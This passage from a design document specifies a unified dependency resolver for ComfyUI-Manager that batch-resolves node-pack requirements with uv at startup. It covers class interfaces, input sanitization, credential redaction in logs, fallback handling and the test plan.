│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
|
||||
│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
|
||||
│ └── unified_dep_resolver.py # New: Unified dependency resolution module
|
||||
├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
|
||||
└── legacy/
|
||||
└── manager_core.py # Legacy (not a modification target)
|
||||
```
|
||||
|
||||
The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
|
||||
It reuses `manager_util` utilities and `cm_global` global state from the same package.
|
||||
|
||||
> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
|
||||
> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
|
||||
> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
|
||||
> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
|
||||
>
|
||||
> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
|
||||
> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
|
||||
> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
|
||||
> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
|
||||
> and will work once real values are provided.
|
||||
|
||||
### 1.2 Overall Flow
|
||||
|
||||
```mermaid
|
||||
flowchart TD
|
||||
subgraph INSTALL_TIME["Install Time (immediate)"]
|
||||
MC["manager_core.py<br/>execute_install_script() — 2 locations"]
|
||||
MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install<br/>(deps deferred to restart)"]
|
||||
MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
|
||||
SKIP --> INST["Run install.py"]
|
||||
PIP --> INST
|
||||
end
|
||||
|
||||
subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
|
||||
CHK{use_unified_resolver?}
|
||||
CHK -->|Yes| UDR
|
||||
CHK -->|No| LAZY["execute_lazy_install_script()<br/>per-node pip install (existing)"]
|
||||
|
||||
subgraph UDR["UnifiedDepResolver (batch)"]
|
||||
S1["1. collect_requirements()<br/>(ALL installed node packs)"]
|
||||
S2["2. compile_lockfile()"]
|
||||
S3["3. install_from_lockfile()"]
|
||||
S1 --> S2 --> S3
|
||||
end
|
||||
|
||||
UDR -->|Success| FIX["PIPFixer.fix_broken()"]
|
||||
UDR -->|Failure| LAZY
|
||||
LAZY --> FIX2["PIPFixer.fix_broken()"]
|
||||
end
|
||||
```
|
||||
|
||||
> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
|
||||
> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
|
||||
> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
|
||||
> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
|
||||
> (empty values passed); `uv pip compile` handles all conflict resolution natively.
|
||||
>
|
||||
> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
|
||||
> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
|
||||
> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
|
||||
> Both skip per-node pip install when unified mode is active.
|
||||
|
||||
### 1.3 uv Command Strategy
|
||||
|
||||
**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
|
||||
- Do not confuse with `uv lock`
|
||||
- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
|
||||
- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
|
||||
|
||||
**`uv pip install -r`** ← Used instead of `uv pip sync`
|
||||
- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
|
||||
- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
|
||||
|
||||
---
|
||||
|
||||
## 2. Class Design
|
||||
|
||||
### 2.1 UnifiedDepResolver
|
||||
|
||||
```python
|
||||
class UnifiedDepResolver:
|
||||
"""
|
||||
Unified dependency resolver.
|
||||
|
||||
Resolves and installs all dependencies of (installed node packs + new node packs)
|
||||
at once using uv.
|
||||
|
||||
Responsibility scope: Dependency resolution and installation only.
|
||||
install.py execution and PIPFixer calls are handled by the caller (manager_core).
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
node_pack_paths: list[str],
|
||||
base_requirements: list[str] | None = None,
|
||||
blacklist: set[str] | None = None,
|
||||
overrides: dict[str, str] | None = None,
|
||||
downgrade_blacklist: list[str] | None = None,
|
||||
):
|
||||
"""
|
||||
Args:
|
||||
node_pack_paths: List of node pack directory paths
|
||||
base_requirements: Base dependencies (ComfyUI requirements, etc.)
|
||||
blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
|
||||
overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
|
||||
downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
|
||||
"""
|
||||
|
||||
def resolve_and_install(self) -> ResolveResult:
|
||||
"""Execute full pipeline: stale cleanup → collect → compile → install.
|
||||
Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
|
||||
|
||||
def collect_requirements(self) -> CollectedDeps:
|
||||
"""Collect dependencies from all node packs"""
|
||||
|
||||
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
|
||||
"""Generate pinned requirements via uv pip compile"""
|
||||
|
||||
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
|
||||
"""Install from pinned requirements (uv pip install -r)"""
|
||||
```
|
||||
|
||||
### 2.2 Data Classes
|
||||
|
||||
```python
|
||||
@dataclass
|
||||
class PackageRequirement:
|
||||
"""Individual package dependency"""
|
||||
name: str # Package name (normalized)
|
||||
spec: str # Original spec (e.g., "torch>=2.0")
|
||||
source: str # Source node pack path
|
||||
|
||||
@dataclass
|
||||
class CollectedDeps:
|
||||
"""All collected dependencies"""
|
||||
requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
|
||||
skipped: list[tuple[str, str]] # (package_name, skip_reason)
|
||||
sources: dict[str, list[str]] # {package_name: [source_node_packs]}
|
||||
extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
|
||||
|
||||
@dataclass
|
||||
class LockfileResult:
|
||||
"""Compilation result"""
|
||||
success: bool
|
||||
lockfile_path: str | None # pinned requirements.txt path
|
||||
conflicts: list[str] # Conflict details
|
||||
stderr: str # uv error output
|
||||
|
||||
@dataclass
|
||||
class InstallResult:
|
||||
"""Installation result (uv pip install -r is atomic: all-or-nothing)"""
|
||||
success: bool
|
||||
installed: list[str] # Installed packages (stdout parsing)
|
||||
skipped: list[str] # Already installed (stdout parsing)
|
||||
stderr: str # uv stderr output (for failure analysis)
|
||||
|
||||
@dataclass
|
||||
class ResolveResult:
|
||||
"""Full pipeline result"""
|
||||
success: bool
|
||||
collected: CollectedDeps | None
|
||||
lockfile: LockfileResult | None
|
||||
install: InstallResult | None
|
||||
error: str | None
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Core Logic Details
|
||||
|
||||
### 3.1 Dependency Collection (`collect_requirements`)
|
||||
|
||||
```python
|
||||
# Input sanitization: dangerous patterns to reject
|
||||
_DANGEROUS_PATTERNS = re.compile(
|
||||
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
|
||||
r'|--find-links\b|-f\b|.*@\s*file://)',
|
||||
re.IGNORECASE
|
||||
)
|
||||
|
||||
def collect_requirements(self) -> CollectedDeps:
|
||||
requirements = []
|
||||
skipped = []
|
||||
sources = defaultdict(list)
|
||||
extra_index_urls = []
|
||||
|
||||
for path in self.node_pack_paths:
|
||||
# Exclude disabled node packs (directory-based mechanism)
|
||||
# Disabled node packs are actually moved to custom_nodes/.disabled/,
|
||||
# so they should already be excluded from input at this point.
|
||||
# Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
|
||||
if ('/.disabled/' in path
|
||||
or os.path.basename(os.path.dirname(path)) == '.disabled'
|
||||
or path.rstrip('/').endswith('.disabled')):
|
||||
continue
|
||||
|
||||
req_file = os.path.join(path, "requirements.txt")
|
||||
if not os.path.exists(req_file):
|
||||
continue
|
||||
|
||||
# chardet-based encoding detection (existing robust_readlines pattern)
|
||||
for line in self._read_requirements(req_file):
|
||||
line = line.split('#')[0].strip()
|
||||
if not line:
|
||||
continue
|
||||
|
||||
# 0. Input sanitization (security)
|
||||
if self._DANGEROUS_PATTERNS.match(line):
|
||||
skipped.append((line, f"rejected: dangerous pattern in {path}"))
|
||||
logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
|
||||
continue
|
||||
|
||||
# 1. Separate --index-url / --extra-index-url handling
|
||||
# (BEFORE path separator check, because URLs contain '/')
|
||||
if '--index-url' in line or '--extra-index-url' in line:
|
||||
pkg_spec, index_url = self._split_index_url(line)
|
||||
if index_url:
|
||||
extra_index_urls.append(index_url)
|
||||
line = pkg_spec
|
||||
if not line:
|
||||
# Standalone option line (no package prefix)
|
||||
continue
|
||||
|
||||
# 1b. Reject path separators in package name portion
|
||||
pkg_name_part = re.split(r'[><=!~;]', line)[0]
|
||||
if '/' in pkg_name_part or '\\' in pkg_name_part:
|
||||
skipped.append((line, f"rejected: path separator in package name"))
|
||||
continue
|
||||
|
||||
# 2. Apply remap_pip_package (using cm_global.pip_overrides)
|
||||
pkg_spec = self._remap_package(line)
|
||||
|
||||
# 3. Blacklist check (cm_global.pip_blacklist)
|
||||
pkg_name = self._extract_package_name(pkg_spec)
|
||||
if pkg_name in self.blacklist:
|
||||
skipped.append((pkg_spec, "blacklisted"))
|
||||
continue
|
||||
|
||||
# 4. Downgrade blacklist check (includes version comparison)
|
||||
if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
|
||||
skipped.append((pkg_spec, "downgrade blacklisted"))
|
||||
continue
|
||||
|
||||
# 5. Collect (no dedup — uv handles resolution)
|
||||
req = PackageRequirement(
|
||||
name=pkg_name,
|
||||
spec=pkg_spec,
|
||||
source=path,
|
||||
)
|
||||
requirements.append(req)
|
||||
sources[pkg_name].append(path)
|
||||
|
||||
return CollectedDeps(
|
||||
requirements=requirements,
|
||||
skipped=skipped,
|
||||
sources=dict(sources),
|
||||
extra_index_urls=list(set(extra_index_urls)), # Deduplicate
|
||||
)
|
||||
|
||||
def _split_index_url(self, line: str) -> tuple[str, str | None]:
|
||||
"""Split 'package_name --index-url URL' → (package_name, URL).
|
||||
|
||||
Also handles standalone ``--index-url URL`` and
|
||||
``--extra-index-url URL`` lines (with no package prefix).
|
||||
"""
|
||||
# Handle --extra-index-url first (contains '-index-url' as substring
|
||||
# but NOT '--index-url' due to the extra-index prefix)
|
||||
for option in ('--extra-index-url', '--index-url'):
|
||||
if option in line:
|
||||
parts = line.split(option, 1)
|
||||
pkg_spec = parts[0].strip()
|
||||
url = parts[1].strip() if len(parts) == 2 else None
|
||||
return pkg_spec, url
|
||||
return line, None
|
||||
|
||||
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
|
||||
"""Reproduce the downgrade version comparison from existing is_blacklisted() logic.
|
||||
|
||||
Same logic as manager_core.py's is_blacklisted():
|
||||
- No version spec and already installed → block (prevent reinstall)
|
||||
- Operator is one of ['<=', '==', '<', '~='] and
|
||||
installed version >= requested version → block (prevent downgrade)
|
||||
- Version comparison uses manager_util.StrictVersion (NOT packaging.version)
|
||||
"""
|
||||
if pkg_name not in self.downgrade_blacklist:
|
||||
return False
|
||||
|
||||
installed_packages = manager_util.get_installed_packages()
|
||||
|
||||
# Version spec parsing (same pattern as existing is_blacklisted())
|
||||
pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
|
||||
match = re.search(pattern, pkg_spec)
|
||||
|
||||
if match is None:
|
||||
# No version spec: prevent reinstall if already installed
|
||||
if pkg_name in installed_packages:
|
||||
return True
|
||||
elif match.group(2) in ['<=', '==', '<', '~=']:
|
||||
# Downgrade operator: block if installed version >= requested version
|
||||
if pkg_name in installed_packages:
|
||||
try:
|
||||
installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
|
||||
requested_ver = manager_util.StrictVersion(match.group(3))
|
||||
if installed_ver >= requested_ver:
|
||||
return True
|
||||
except (ValueError, TypeError):
|
||||
logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
|
||||
return False
|
||||
|
||||
return False
|
||||
|
||||
def _remap_package(self, pkg: str) -> str:
|
||||
"""Package name remapping based on cm_global.pip_overrides.
|
||||
Reuses existing remap_pip_package() logic."""
|
||||
if pkg in self.overrides:
|
||||
remapped = self.overrides[pkg]
|
||||
logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
|
||||
return remapped
|
||||
return pkg
|
||||
```
|
||||
|
||||
### 3.2 Lockfile Generation (`compile_lockfile`)
|
||||
|
||||
**Behavior:**
|
||||
1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
|
||||
2. Write collected requirements and base constraints to temp files
|
||||
3. Execute `uv pip compile` with options:
|
||||
- `--output-file` (pinned requirements path within temp dir)
|
||||
- `--python` (current interpreter)
|
||||
- `--constraint` (base dependencies)
|
||||
- `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
|
||||
4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
|
||||
5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
|
||||
6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
|
||||
7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
|
||||
|
||||
### 3.3 Dependency Installation (`install_from_lockfile`)
|
||||
|
||||
**Behavior:**
|
||||
1. Execute `uv pip install --requirement <lockfile_path> --python <sys.executable>`
|
||||
- **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
|
||||
2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
|
||||
3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
|
||||
4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
|
||||
5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
|
||||
|
||||
### 3.4 uv Command Resolution
|
||||
|
||||
**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
|
||||
1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
|
||||
2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
|
||||
3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
|
||||
|
||||
### 3.5 Stale Temp File Cleanup
|
||||
|
||||
**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
|
||||
- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
|
||||
- Deletes directories older than `max_age_seconds` (default: 1 hour)
|
||||
- Silently ignores `OSError` (permission issues, etc.)
|
||||
|
||||
### 3.6 Credential Redaction
|
||||
|
||||
```python
|
||||
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
|
||||
|
||||
def _redact_url(self, url: str) -> str:
|
||||
"""Mask authentication info in URLs. user:pass@host → ****@host"""
|
||||
return self._CREDENTIAL_PATTERN.sub('://****@', url)
|
||||
```
|
||||
|
||||
All `--extra-index-url` logging passes through `_redact_url()`:
|
||||
```python
|
||||
# Logging example within compile_lockfile()
|
||||
for url in deps.extra_index_urls:
|
||||
logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
|
||||
cmd += ["--extra-index-url", url] # Original URL passed to actual command
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 4. Existing Code Integration
|
||||
|
||||
### 4.1 manager_core.py Modification Points
|
||||
|
||||
**2 `execute_install_script()` locations — both skip deps in unified mode:**
|
||||
|
||||
#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
|
||||
|
||||
#### 4.1.2 Standalone Function execute_install_script()
|
||||
|
||||
**Both locations use the same pattern when unified mode is active:**
|
||||
|
||||
1. `lazy_mode=True` → schedule and return early (unchanged)
|
||||
2. If `not no_deps and manager_util.use_unified_resolver`:
|
||||
- **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
|
||||
- Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
|
||||
3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
|
||||
4. `install.py` execution: **always runs immediately** regardless of resolver mode
|
||||
|
||||
> **Parameter ordering differs:**
|
||||
> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
|
||||
> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
|
||||
|
||||
### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
|
||||
|
||||
**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
|
||||
|
||||
**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
|
||||
|
||||
**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
|
||||
1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
|
||||
2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
|
||||
3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
|
||||
4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
|
||||
5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
|
||||
|
||||
> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
|
||||
> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
|
||||
|
||||
### 4.1.5 `execute_lazy_install_script()` Modification
|
||||
|
||||
When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
|
||||
(deps already batch-resolved at module scope). `install.py` still runs per node pack.
|
||||
|
||||
```python
|
||||
# In execute_lazy_install_script():
|
||||
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
|
||||
# Per-node pip install: only runs if unified resolver is disabled or failed
|
||||
...
|
||||
# install.py always runs regardless
|
||||
```
|
||||
|
||||
> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
|
||||
> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
|
||||
|
||||
### 4.2 Configuration Addition (config.ini)
|
||||
|
||||
```ini
|
||||
[default]
|
||||
# Existing settings...
|
||||
use_unified_resolver = false # Enable unified dependency resolution
|
||||
```
|
||||
|
||||
### 4.3 Configuration Reading
|
||||
|
||||
Follows the existing `read_uv_mode()` / `use_uv` pattern:
|
||||
- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
|
||||
- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
|
||||
- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
|
||||
|
||||
### 4.4 manager_util.py Extension
|
||||
|
||||
```python
|
||||
# manager_util.py
|
||||
use_unified_resolver = False # New global flag (separate from use_uv)
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 5. Error Handling Strategy
|
||||
|
||||
```mermaid
|
||||
flowchart TD
|
||||
STARTUP["prestartup_script.py startup"]
|
||||
STARTUP --> CHK{use_unified_resolver?}
|
||||
CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
|
||||
|
||||
CHK -->|Yes| RAI["run_unified_resolver()"]
|
||||
RAI --> STALE["cleanup_stale_tmp()<br/>Clean stale temp dirs (>1 hour old)"]
|
||||
STALE --> UV_CHK{uv installed?}
|
||||
UV_CHK -->|No| UV_ERR["UvNotAvailableError<br/>→ Fallback: execute_lazy_install_script per-node pip"]
|
||||
|
||||
UV_CHK -->|Yes| CR["collect_requirements()<br/>(ALL installed node packs)"]
|
||||
CR --> CR_DIS[".disabled/ path → auto-skip"]
|
||||
CR --> CR_PARSE["Parse failure → skip node pack, continue"]
|
||||
CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
|
||||
CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
|
||||
CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
|
||||
|
||||
CR --> CL["compile_lockfile()"]
|
||||
CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
|
||||
CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
|
||||
CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
|
||||
CL --> CL_TMP["Temp directory → finally block cleanup"]
|
||||
|
||||
CL -->|Success| IL["install_from_lockfile()"]
|
||||
IL --> IL_OK["Total success → parse installed/skipped"]
|
||||
IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
|
||||
IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
|
||||
|
||||
IL_OK --> PF["PIPFixer.fix_broken()<br/>Restore torch/opencv/frontend"]
|
||||
PF --> LAZY["execute_lazy_install_script()<br/>(install.py only, deps skipped)"]
|
||||
```
|
||||
|
||||
> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
|
||||
> (per-node pip install), providing the same behavior as if unified mode were disabled.
|
||||
|
||||
---
|
||||
|
||||
## 6. File Structure
|
||||
|
||||
### 6.1 New Files
|
||||
|
||||
```
|
||||
comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
|
||||
tests/test_unified_dep_resolver.py # Unit tests
|
||||
```
|
||||
|
||||
### 6.2 Modified Files
|
||||
|
||||
```
|
||||
comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
|
||||
comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
|
||||
comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
|
||||
```
|
||||
|
||||
> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
|
||||
|
||||
---
|
||||
|
||||
## 7. Dependencies
|
||||
|
||||
| Dependency | Purpose | Notes |
|
||||
|-----------|---------|-------|
|
||||
| `uv` | Dependency resolution and installation | Already included in project dependencies |
|
||||
| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
|
||||
| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
|
||||
| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
|
||||
| `subprocess` | uv process execution | Standard library |
|
||||
| `dataclasses` | Result data structures | Standard library |
|
||||
| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
|
||||
| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
|
||||
| `time` | Stale temp file age calculation | Standard library |
|
||||
| `logging` | Per-step logging | Standard library |
|
||||
|
||||
No additional external dependencies.
|
||||
|
||||
---
|
||||
|
||||
## 8. Sequence Diagram
|
||||
|
||||
### Install Time + Startup Batch Resolution
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
actor User
|
||||
participant MC as manager_core
|
||||
participant PS as prestartup_script
|
||||
participant UDR as UnifiedDepResolver
|
||||
participant UV as uv (CLI)
|
||||
|
||||
Note over User,MC: Install Time (immediate)
|
||||
User->>MC: Install node pack X
|
||||
MC->>MC: Git clone / download X
|
||||
MC->>MC: Skip per-node pip (unified mode)
|
||||
MC->>MC: Run X's install.py
|
||||
MC-->>User: Node pack installed (deps pending)
|
||||
|
||||
Note over User,UV: ComfyUI Restart
|
||||
User->>PS: Start ComfyUI
|
||||
PS->>PS: Check use_unified_resolver
|
||||
PS->>UDR: Create resolver (module scope)
|
||||
UDR->>UDR: collect_requirements()<br/>(ALL installed node packs)
|
||||
UDR->>UV: uv pip compile --output-file
|
||||
UV-->>UDR: pinned reqs.txt
|
||||
UDR->>UV: uv pip install -r
|
||||
UV-->>UDR: Install result
|
||||
UDR-->>PS: ResolveResult(success=True)
|
||||
PS->>PS: PIPFixer.fix_broken()
|
||||
PS->>PS: execute_lazy_install_script()<br/>(install.py only, deps skipped)
|
||||
PS-->>User: ComfyUI ready
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Test Strategy
|
||||
|
||||
### 9.1 Unit Tests
|
||||
|
||||
| Test Target | Cases |
|
||||
|------------|-------|
|
||||
| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
|
||||
| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
|
||||
| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
|
||||
| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
|
||||
| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
|
||||
| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
|
||||
| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
|
||||
| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
|
||||
| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
|
||||
| Atomic model | On failure: installed=[], stderr populated |
|
||||
| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
|
||||
| `_remap_package` | pip_overrides remapping, unregistered packages |
|
||||
| Blacklist | torch family, torchsde, custom blacklist |
|
||||
| Duplicate handling | Same package with multiple specs → all passed to uv |
|
||||
| Multiple paths | Collection from multiple custom_nodes paths |
|
||||
| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
|
||||
| Concurrency | Two resolver instances each use unique temp directories |
|
||||
| Credential redaction | `user:pass@host` URL masked in log output |
|
||||
| `_redact_url` | `://user:pass@host` → `://****@host` conversion, no-credential URL passthrough |
|
||||
| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
|
||||
| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
|
||||
| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
|
||||
|
||||
### 9.2 Integration Tests
|
||||
|
||||
- End-to-end test in real uv environment
|
||||
- Existing pip fallback path test
|
||||
- config.ini setting toggle test
|
||||
- Environment integrity verification after PIPFixer call
|
||||
- lazy_mode scheduling behavior verification (Windows simulation)
|
||||
- `use_uv=False` + `use_unified_resolver=True` combination test
|
||||
- Large-scale dependency (50+ node packs) performance test
|
||||
|
||||
---
|
||||
|
||||
## 10. Implementation Order
|
||||
|
||||
1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
|
||||
- PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
|
||||
- Blacklist/override filtering
|
||||
- **Downgrade blacklist** (version comparison logic included)
|
||||
- **Input sanitization** (-r, -e, @ file:// etc. rejection)
|
||||
- **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
|
||||
- **`.disabled` node pack filtering**
|
||||
- Defensive cm_global access (getattr pattern)
|
||||
2. **Phase 2**: `compile_lockfile` implementation + tests
|
||||
- uv pip compile invocation
|
||||
- --output-file, --constraint, --python options
|
||||
- Conflict parsing logic
|
||||
3. **Phase 3**: `install_from_lockfile` implementation + tests
|
||||
- uv pip install -r invocation (NOT sync)
|
||||
- Install result parsing
|
||||
4. **Phase 4**: Integration — startup batch + install-time skip
|
||||
- `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
|
||||
- `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
|
||||
- `manager_util.py`: `use_unified_resolver` flag
|
||||
- Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
|
||||
5. **Phase 5**: Integration tests + fallback verification + startup batch tests
|
||||
|
||||
---
|
||||
|
||||
## Appendix A: Existing Code Reference
|
||||
|
||||
> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
|
||||
> Use `grep -n` or IDE symbol search for exact locations.
|
||||
|
||||
### remap_pip_package Location (Code Duplication Exists)
|
||||
|
||||
```
|
||||
comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
|
||||
comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
|
||||
```
|
||||
|
||||
Both reference `cm_global.pip_overrides` with identical logic.
|
||||
The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
|
||||
|
||||
### cm_global Global State
|
||||
|
||||
```python
|
||||
# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
|
||||
cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
|
||||
cm_global.pip_overrides = {} # dict, loaded from JSON
|
||||
cm_global.pip_downgrade_blacklist = [ # list
|
||||
'torch', 'torchaudio', 'torchsde', 'torchvision',
|
||||
'transformers', 'safetensors', 'kornia'
|
||||
]
|
||||
```
|
||||
|
||||
> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
|
||||
> If the resolver may be called from the CLI path, this initialization should also be verified.
|
||||
|
||||
### PIPFixer Call Pattern
|
||||
|
||||
```python
|
||||
# Within UnifiedManager.execute_install_script() method in manager_core.py:
|
||||
pip_fixer = manager_util.PIPFixer(
|
||||
manager_util.get_installed_packages(),
|
||||
context.comfy_path,
|
||||
context.manager_files_path
|
||||
)
|
||||
# ... (after installation)
|
||||
